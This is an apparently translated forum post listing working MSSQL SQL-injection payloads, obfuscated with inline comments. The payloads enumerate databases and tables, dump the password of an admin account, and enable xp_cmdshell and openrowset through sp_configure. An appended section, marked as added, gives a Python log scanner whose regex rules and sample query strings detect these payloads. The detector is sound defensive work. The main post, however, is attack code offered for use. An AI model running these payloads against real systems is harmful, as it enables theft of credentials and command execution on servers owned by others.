CODE:
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--

Table-enumeration statement. The somedb part is the database whose tables are to be listed; increment the number 1 shown in red.

CODE:
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--

Column-dump statement: extracts the password field of the row where user='icerover' in table admin.

CODE:
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--

MSSQL 2005 does not enable xp_cmdshell by default, and openrowset cannot be used either.
With sa privileges, they can be enabled as follows.

Enable openrowset

CODE:
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--

Enable xp_cmdshell

CODE:
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--

OK, that's all~~ Good night.
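
Added example, not part of the original post: a log-side check that normalizes a request's query string (URL-decoding, replacing `/**/` comments with spaces) and then matches the indicators that appear in the statements above. The rule names, the `classify` and `scan` helpers and the sample requests are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)

# Indicators taken from the statements in the post, matched after normalization.
RULES = {
    "db_enumeration": re.compile(r"\bsysdatabases\b"),
    "table_enumeration": re.compile(r"\bsys\.all_objects\b"),
    "config_change": re.compile(
        r"\bsp_configure\b.*\b(xp_cmdshell|ad hoc distributed queries|"
        r"show advanced options)\b"),
    "error_based_cast": re.compile(r"\bselect top \d+ (isnull\()?cast\("),
}


def normalize(raw_query):
    """URL-decode, turn /**/ comments into spaces, drop [] quoting, lowercase."""
    text = unquote_plus(raw_query)
    text = INLINE_COMMENT.sub(" ", text)
    text = re.sub(r"[\[\]]", "", text)
    return re.sub(r"\s+", " ", text).lower().strip()


def classify(raw_query):
    """Return the sorted list of rule names that fire for one query string."""
    text = normalize(raw_query)
    hits = [name for name, rx in RULES.items() if rx.search(text)]
    # Several empty comments standing in for spaces is a signal on its own.
    if raw_query.count("/**/") >= 3:
        hits.append("comment_obfuscation")
    return sorted(hits)


def scan(queries):
    """Map each flagged query string to its rule hits; clean ones are omitted."""
    return {q: classify(q) for q in queries if classify(q)}


# Constructed sample query strings (shortened forms of the statements above).
SAMPLES = [
    "id=7",
    "q=show+advanced+options+in+the+docs",
    "id=7/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))"
    "/**/from/**/somedb.sys.all_objects)%3d0--",
    "id=7;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--",
]

if __name__ == "__main__":
    for query, hits in scan(SAMPLES).items():
        print(hits, query[:60])
```

On the database side, the same option names can be checked in `sys.configurations` to confirm that xp_cmdshell and Ad Hoc Distributed Queries are still off.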